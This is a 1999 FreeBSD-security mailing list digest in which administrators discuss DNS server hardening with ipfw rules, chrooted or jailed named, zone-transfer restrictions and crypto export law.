bulk X-Loop: FreeBSD.org In message <37C0DB86.838CF89E@softweyr.com> Wes Peters writes: : Apparently Darren didn't read the blurbs about the Linux Death Match : at the recent Chaos Computer Club campout in Germany. It was won by : a FreeBSD box with NO offensive effort, only defense. Seems like we should have a pointer from our web site for that :-) Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 11:40:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 21D4D14F35; Mon, 23 Aug 1999 11:40:15 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA70283; Mon, 23 Aug 1999 12:40:09 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA40683; Mon, 23 Aug 1999 12:40:50 -0600 (MDT) Message-Id: <199908231840.MAA40683@harmony.village.org> To: Wes Peters Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 Cc: E Kovarski , Alex Nash , freebsd-security@FreeBSD.ORG, advocacy@FreeBSD.ORG In-reply-to: Your message of "Mon, 23 Aug 1999 12:22:57 MDT." <37C19181.9046615A@softweyr.com> References: <37C19181.9046615A@softweyr.com> <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> <19990822234351.D18458@amber.org> <37C0DB86.838CF89E@softweyr.com> <87k8qnauj4.fsf@nyctereutes.digitalized.com> Date: Mon, 23 Aug 1999 12:40:49 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37C19181.9046615A@softweyr.com> Wes Peters writes: : Several others have asked for this as well, so here's the first : mention of it: : http://www.computerworld.com/home/news.nsf/all/9908102chaos Yes, but where's the claymation MPEG of the Linux Death Match :-) Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 12:35:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id 9F1AC158F1 for ; Mon, 23 Aug 1999 12:35:26 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id NAA01793 for ; Mon, 23 Aug 1999 13:35:21 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id NAA01122; Mon, 23 Aug 1999 13:35:21 -0600 Date: Mon, 23 Aug 1999 13:35:21 -0600 Message-Id: <199908231935.NAA01122@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: freebsd-security@FreeBSD.org Subject: IPFW/DNS rules X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@mt.sri.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have a public DNS server that I need people to be able to query, but is there anything I can do to avoid anyone doing anything 'nasty' to it. Also, I need to open up access to it to those hosts that secondary me, as well as those I secondary for. (I also want to make sure that none of my internal hosts 'leak' DNS stuff, but that they also all go through the DNS server in order to find hosts...) I've got some rules in place, but if someone has gotten DNS firewall rules I'd be grateful to see them. Thanks! Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 12:48:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 8D2D415122 for ; Mon, 23 Aug 1999 12:48:34 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id MAA10395; Mon, 23 Aug 1999 12:48:09 -0700 (PDT) (envelope-from dillon) Date: Mon, 23 Aug 1999 12:48:09 -0700 (PDT) From: Matthew Dillon Message-Id: <199908231948.MAA10395@apollo.backplane.com> To: Nate Williams Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules References: <199908231935.NAA01122@mt.sri.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :I've got some rules in place, but if someone has gotten DNS firewall :rules I'd be grateful to see them. : :Thanks! : :Nate If you are primary for one or more domains the server that serves those domains should be configured for read-only operation. It should not be configured as a caching server. If you do that the server will be reasonably well protected. You can create allow/deny lists in named.conf, configuration options are well documented in the bind distribution, in your source tree: file:/usr/src/contrib/bind/doc/html/ -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 12:55: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 703B414ED4 for ; Mon, 23 Aug 1999 12:54:57 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 3F2D91C2B; Mon, 23 Aug 1999 14:55:55 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 3A3023826; Mon, 23 Aug 1999 14:55:55 -0400 (EDT) Date: Mon, 23 Aug 1999 14:55:55 -0400 (EDT) From: Bill Fumerola To: Matthew Dillon Cc: Nate Williams , freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules In-Reply-To: <199908231948.MAA10395@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 23 Aug 1999, Matthew Dillon wrote: > You can create allow/deny lists in named.conf, configuration options are > well documented in the bind distribution, in your source tree: He wants to secure the server with firewall rules, not the service, I believe. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 12:59:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 5CC8515731 for ; Mon, 23 Aug 1999 12:59:20 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id MAA10488; Mon, 23 Aug 1999 12:58:50 -0700 (PDT) (envelope-from dillon) Date: Mon, 23 Aug 1999 12:58:50 -0700 (PDT) From: Matthew Dillon Message-Id: <199908231958.MAA10488@apollo.backplane.com> To: Bill Fumerola Cc: Nate Williams , freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :On Mon, 23 Aug 1999, Matthew Dillon wrote: : :> You can create allow/deny lists in named.conf, configuration options are :> well documented in the bind distribution, in your source tree: : :He wants to secure the server with firewall rules, not the service, I :believe. : :-- :- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - :- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - Simply do not run any other services on the server except, say, sshd. That's what we did at BEST. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13: 2:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 4375414FC9 for ; Mon, 23 Aug 1999 13:02:13 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id NAA05013; Mon, 23 Aug 1999 13:01:17 -0700 (PDT) Message-ID: <19990823130116.B1797@best.com> Date: Mon, 23 Aug 1999 13:01:16 -0700 From: "Jan B. Koum " To: Matthew Dillon , Nate Williams Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules References: <199908231935.NAA01122@mt.sri.com> <199908231948.MAA10395@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199908231948.MAA10395@apollo.backplane.com>; from Matthew Dillon on Mon, Aug 23, 1999 at 12:48:09PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Aug 23, 1999 at 12:48:09PM -0700, Matthew Dillon wrote: > :I've got some rules in place, but if someone has gotten DNS firewall > :rules I'd be grateful to see them. > : > :Thanks! > : > :Nate > > If you are primary for one or more domains the server that serves those > domains should be configured for read-only operation. It should not be > configured as a caching server. If you do that the server will be > reasonably well protected. > > You can create allow/deny lists in named.conf, configuration options are > well documented in the bind distribution, in your source tree: > > file:/usr/src/contrib/bind/doc/html/ > > -Matt > Matthew Dillon > One can also run named in chroot() environment and as non-root user. In fact, this is exactly what we are doing where I work: 85-jkb(nautilus)% ssh dns1.corp ps ax | grep named 106 ?? Ss 0:30.01 syslogd -s -l /var/named/dev/log 27897 ?? Ss 1047:54.55 /var/named/named -u bind -g bind -t /var/named -- yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:12:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from iaehv.iae.nl (iaehv.IAE.nl [194.151.64.2]) by hub.freebsd.org (Postfix) with ESMTP id 7938A1504B for ; Mon, 23 Aug 1999 13:12:43 -0700 (PDT) (envelope-from wjw@iae.nl) Received: from wjw (wjw.digiware.nl [212.61.27.68]) by iaehv.iae.nl (Postfix) with SMTP id 2635F20F85; Mon, 23 Aug 1999 22:09:58 +0200 (CEST) Message-ID: <05d801beeda4$8765ae80$441b3dd4@wjw.digiware.nl> From: "Willem Jan Withagen" To: "Ollivier Robert" Cc: Subject: Re: getting passwored data via a perl cgi Date: Mon, 23 Aug 1999 22:17:30 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2106.4 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I did it the other way around: I wrote a Apache security module which takes usercode/password and then veryfies it at the POP-port. If you don't want POP outside the box, use tcpwrappers or a firewall to hide them. The advantage is that this code is very unlikely to be stored in a cache/proxy, whilest I've found plenty of "pages" in many Win'95/OS2 caches containing usercode/password combinations --WjW PS: code is available, but RAW -----Original Message----- From: Ollivier Robert To: freebsd-security@freebsd.org Date: zondag 22 augustus 1999 23:00 Subject: Re: getting passwored data via a perl cgi >According to Colin Eric Johnson: >> Is there a way to allow other users access to complete password database? >> I understand, basically, why this is restricted but I'm not sure how else >> to solve this given FreeBSDs restrictions. > >Either you make it setuid root or you wipe up a daemon that runs as root and >make your script discuss with the daemon. The daemon could cache entries for >example (although pwd lookups should be fast thanks to the DB files). >-- >Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr >FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999 > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:12:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 408A81505E for ; Mon, 23 Aug 1999 13:12:45 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id WAA11141; Mon, 23 Aug 1999 22:08:18 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: "Jan B. Koum " Cc: Matthew Dillon , Nate Williams , freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules In-reply-to: Your message of "Mon, 23 Aug 1999 13:01:16 PDT." <19990823130116.B1797@best.com> Date: Mon, 23 Aug 1999 22:08:18 +0200 Message-ID: <11139.935438898@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990823130116.B1797@best.com>, "Jan B. Koum " writes: >One can also run named in chroot() environment and as non-root user. In >fact, this is exactly what we are doing where I work: > >85-jkb(nautilus)% ssh dns1.corp ps ax | grep named > 106 ?? Ss 0:30.01 syslogd -s -l /var/named/dev/log >27897 ?? Ss 1047:54.55 /var/named/named -u bind -g bind -t /var/named Even better yet: Run it in a jail with it's own IP number... -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:13: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id BA62F157A2 for ; Mon, 23 Aug 1999 13:12:56 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id OAA02208; Mon, 23 Aug 1999 14:11:42 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id OAA01520; Mon, 23 Aug 1999 14:11:41 -0600 Date: Mon, 23 Aug 1999 14:11:41 -0600 Message-Id: <199908232011.OAA01520@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Poul-Henning Kamp Cc: "Jan B. Koum " , Matthew Dillon , Nate Williams , freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules In-Reply-To: <11139.935438898@critter.freebsd.dk> References: <19990823130116.B1797@best.com> <11139.935438898@critter.freebsd.dk> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@mt.sri.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >One can also run named in chroot() environment and as non-root user. In > >fact, this is exactly what we are doing where I work: > > > >85-jkb(nautilus)% ssh dns1.corp ps ax | grep named > > 106 ?? Ss 0:30.01 syslogd -s -l /var/named/dev/log > >27897 ?? Ss 1047:54.55 /var/named/named -u bind -g bind -t /var/named > > Even better yet: Run it in a jail with it's own IP number... This box isn't ready for -current, or more to the point, -current isn't ready for prime-time anytime soon. :) :) :) Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:13:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 0919A15734 for ; Mon, 23 Aug 1999 13:13:24 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id NAA36075; Mon, 23 Aug 1999 13:12:55 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908232012.NAA36075@gndrsh.dnsmgr.net> Subject: Re: IPFW/DNS rules In-Reply-To: <199908231935.NAA01122@mt.sri.com> from Nate Williams at "Aug 23, 1999 01:35:21 pm" To: nate@mt.sri.com (Nate Williams) Date: Mon, 23 Aug 1999 13:12:55 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I have a public DNS server that I need people to be able to query, but > is there anything I can do to avoid anyone doing anything 'nasty' to it. Not a whole lot you can do here, other than keep on top of the latest versions of bind from ISC. > > Also, I need to open up access to it to those hosts that secondary me, > as well as those I secondary for. That one is easy, 2 things to do. First, list those who are secondaries for zones on this box in the named.conf options {allow_transfer{ip list}}; Second since xfers are done via TCP setup rules to allow only your secondaries to ``setup'' connections to your primary, and allow your server to ``setup'' connections to the servers it secondaries for. You should use an option {query-source address X port 53;}; to make this easier. Here is a sample snip from named.conf: options { directory "/etc/namedb"; listen-on port 53 { 127.0.0.1; A.B.C.D; }; query-source address A.B.C.D port 53; allow_transfer { OUTSIDEIP; }; }; > (I also want to make sure that none of my internal hosts 'leak' DNS > stuff, but that they also all go through the DNS server in order to find > hosts...) > > I've got some rules in place, but if someone has gotten DNS firewall > rules I'd be grateful to see them. These rules only log things, they are not meant to stop things, all logs are carefully investigated (IP's blacked out to protect the parties and myself, A.B.C.D is the inside DNS, W.X.Y.Z is the outside DNS, the other 400 rules that don't deal with DNS blacked out as well :-)): ipfw add 10000 allow tcp from any to any established ipfw add 10530 allow tcp from A.B.C.D to W.X.Y.Z 53 setup ipfw add 10539 allow log tcp from any to any 53 ipfw add 40530 allow udp from any to A.B.C.D 53 ipfw add 40530 allow udp from A.B.C.D 53 to any ipfw add 40539 allow log udp from any to any 53 ipfw add 40539 allow log udp from any 53 to any To make this work for you change ``allow log'' to ``deny'' or ``deny log''. Also the above rules don't include the inside DNS doing zone transfers from outside DNS boxes. Add another 10530 rule: ipfw add 10530 allow tcp from OUTSIDE to INSIDE 53 setup Hope that helps... -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:25: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id 99DC51571E for ; Mon, 23 Aug 1999 13:25:00 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id OAA02360; Mon, 23 Aug 1999 14:24:04 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id OAA01685; Mon, 23 Aug 1999 14:24:01 -0600 Date: Mon, 23 Aug 1999 14:24:01 -0600 Message-Id: <199908232024.OAA01685@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: "Rodney W. Grimes" Cc: nate@mt.sri.com (Nate Williams), freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules In-Reply-To: <199908232012.NAA36075@gndrsh.dnsmgr.net> References: <199908231935.NAA01122@mt.sri.com> <199908232012.NAA36075@gndrsh.dnsmgr.net> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@mt.sri.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > I have a public DNS server that I need people to be able to query, but > > is there anything I can do to avoid anyone doing anything 'nasty' to it. > > Not a whole lot you can do here, other than keep on top of the latest > versions of bind from ISC. *sigh* Guess Bind is really in the same category as sendmail then. Unfortunately, BIND has it's hooks all over the system, including the C library. Can I just install the named and not worry about anything else, leaving the system the same? The box in question is running 2.2.8, and I *really* don't want to upgrade it if I can avoid it. (Note, this is a dedicated box w/out any accounts on it, so I don't care about non-external breakins. You can't get into it w/out SSH logins anyway....) > > Also, I need to open up access to it to those hosts that secondary me, > > as well as those I secondary for. > > That one is easy, 2 things to do. First, list those who are secondaries > for zones on this box in the named.conf options {allow_transfer{ip > list}}; .... > Second since xfers are done via TCP setup rules to allow only your secondaries > to ``setup'' connections to your primary, and allow your server to > ``setup'' connections to the servers it secondaries for. Can I setup firewall rules for this as well? Do normal queries require TCP connections? I'd like to be able to 'shutoff' TCP access to the box except from my secondaries if at all possible. Is there anywhere I can find the protocol information aside from using the source? Any good BIND books? (I've got the O'Reilly TCP book, but it's way out of date and not much help anymore...) > > (I also want to make sure that none of my internal hosts 'leak' DNS > > stuff, but that they also all go through the DNS server in order to find > > hosts...) > > > > I've got some rules in place, but if someone has gotten DNS firewall > > rules I'd be grateful to see them. > > These rules only log things, they are not meant to stop things, all logs > are carefully investigated (IP's blacked out to protect the parties and > myself, A.B.C.D is the inside DNS, W.X.Y.Z is the outside DNS, the other > 400 rules that don't deal with DNS blacked out as well :-)): > > ipfw add 10000 allow tcp from any to any established > ipfw add 10530 allow tcp from A.B.C.D to W.X.Y.Z 53 setup So far so good. You're limiting your firewall to only connect to a primary/secondary. > ipfw add 10539 allow log tcp from any to any 53 This seems insecure to me. Any external host can connect to port 53 on your internal hosts. Also, internal hosts can 'leak' information out externally. > ipfw add 40530 allow udp from any to A.B.C.D 53 Fairly secure, as long as BIND on A.B.C.D is secure, which we hafta assume at some point. :) > ipfw add 40530 allow udp from A.B.C.D 53 to any > ipfw add 40539 allow log udp from any to any 53 This is *NOT* secure, just like the TCP port. > ipfw add 40539 allow log udp from any 53 to any This is also insecure, in that it allows anyone to use source port 53 to connect to *any* UDP port in your network. Am I being paranoid? You betcha. A number of machines at work in another division were compromised recently, including one running a commercial firewall. Do I feel safe? Pretty much, but when things like this happen, you like to go through your system and crank everything down a couple more notches. :( > Also the above rules don't include the inside DNS doing zone transfers > from outside DNS boxes. Add another 10530 rule: > ipfw add 10530 allow tcp from OUTSIDE to INSIDE 53 setup Yep. > Hope that helps... They look like mine except that my are even more paranoid than yours. However, I don't like what I have, and was hoping someone could tell me how to lock things down better. Any good books on this? Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:26:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id 9BDE014CC0 for ; Mon, 23 Aug 1999 13:26:45 -0700 (PDT) (envelope-from freebsd@deepwell.com) Received: (qmail 3524 invoked from network); 23 Aug 1999 21:10:29 -0000 Received: from proxy.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 23 Aug 1999 21:10:29 -0000 Message-Id: <4.2.0.58.19990823131756.01edf5d0@mail1.dcomm.net> X-Sender: freebsd@mail.deepwell.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Mon, 23 Aug 1999 13:19:17 -0700 To: Poul-Henning Kamp , freebsd-security@freebsd.org From: Deepwell Internet Subject: Re: IPFW/DNS rules In-Reply-To: <11139.935438898@critter.freebsd.dk> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm not familliar with jail as an admin term or a command. Can you tell me where I can find more information on this? Is it an admin philosophy or a tool? > >One can also run named in chroot() environment and as non-root user. In > >fact, this is exactly what we are doing where I work: > > > >85-jkb(nautilus)% ssh dns1.corp ps ax | grep named > > 106 ?? Ss 0:30.01 syslogd -s -l /var/named/dev/log > >27897 ?? Ss 1047:54.55 /var/named/named -u bind -g bind -t /var/named > >Even better yet: Run it in a jail with it's own IP number... > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:39:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id ECC83151BA for ; Mon, 23 Aug 1999 13:39:18 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 99209 invoked by uid 1001); 23 Aug 1999 20:37:37 +0000 (GMT) To: nate@mt.sri.com Cc: freebsd@gndrsh.dnsmgr.net, freebsd-security@FreeBSD.ORG Subject: Re: IPFW/DNS rules From: sthaug@nethelp.no In-Reply-To: Your message of "Mon, 23 Aug 1999 14:24:01 -0600" References: <199908232024.OAA01685@mt.sri.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 23 Aug 1999 22:37:37 +0200 Message-ID: <99207.935440657@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Not a whole lot you can do here, other than keep on top of the latest > > versions of bind from ISC. > > *sigh* Guess Bind is really in the same category as sendmail then. > Unfortunately, BIND has it's hooks all over the system, including the C > library. Can I just install the named and not worry about anything > else, leaving the system the same? The box in question is running > 2.2.8, and I *really* don't want to upgrade it if I can avoid it. You can install 8.2.1 just fine on a 2.2.8 box. It's a good idea to get 8.2.1 (or newer - 8.2.2 is now in public beta test) because of security fixes. For one thing, 8.2 and newer lets you randomize query id's - 8.1.2 doesn't. > > Second since xfers are done via TCP setup rules to allow only your secondaries > > to ``setup'' connections to your primary, and allow your server to > > ``setup'' connections to the servers it secondaries for. > > Can I setup firewall rules for this as well? Do normal queries require > TCP connections? I'd like to be able to 'shutoff' TCP access to the box > except from my secondaries if at all possible. That would be a pretty bad idea in general: - A resolver is *allowed* to use TCP for DNS queries. - The RFC specifies that a resolver *should* retry using TCP if a UDP answer is too big (and thus gets the TC, Truncated, bit set). Of course, a for primary which is behind a firewall, and only supposed to be accessed from the secondaries, the situation is different. For general DNS info, try http://www.dns.net/dnsrd/. The best book is the O'Reilly "DNS and BIND" book by Albitz and Liu. Make sure you get the newest edition. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:39:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id C46DD14CC0 for ; Mon, 23 Aug 1999 13:39:34 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id QAA22922; Mon, 23 Aug 1999 16:38:23 -0400 (EDT) (envelope-from wollman) Date: Mon, 23 Aug 1999 16:38:23 -0400 (EDT) From: Garrett Wollman Message-Id: <199908232038.QAA22922@khavrinen.lcs.mit.edu> To: Warner Losh Cc: freebsd-security@FreeBSD.ORG Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 In-Reply-To: <199908231835.MAA40614@harmony.village.org> References: <4726.935379766@localhost> <199908231835.MAA40614@harmony.village.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > InSecureBSD? I don't think so. FreeBSD takes security very > seriously... I think that since we're based in the bay area that > export of crypto is completely legal. Well, yes and no. You would do well to read the decision of the Appeals Court. The judges ruled that export controls on crypto SOURCE CODE were unconstitutional. They chose not to decide the question of whether export controls on binaries were also unconstitutional, although the way the decision was drawn suggests that the appeals court would decide the other way on that question if such a controversy arose. They found the district court's rationale unconvincing, and decided the case on the basis of a different legal theory. This is now good law in the Ninth Circuit. I do not believe the question has reached a similar level in any of the other circuits, so there may not be a national rule for some time. (I don't know if the government has yet appealed the Ninth Circuit's decision. If I were the government, I probably would not appeal this decision and instead wait for a case in another circuit where the facts were a bit more conducive.) At any rate, for those of us who do not live on the West Coast, export controls remain a fact of life. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 23 13:44:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 0A33B1514B for ; Mon, 23 Aug 1999 13:44:14 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id WAA11318; Mon, 23 Aug 1999 22:42:32 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Deepwell Internet Cc: freebsd-security@freebsd.org Subject: Re: IPFW/DNS rules In-reply-to: Your message of "Mon, 23 Aug 1999 13:19:17 PDT." <4.2.0.58.19990823131756.01edf5d0@mail1.dcomm.net> Date: Mon, 23 Aug 1999 22:42:32 +0200 Message-ID: <11316.935440952@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org check on a current system: man jail In message 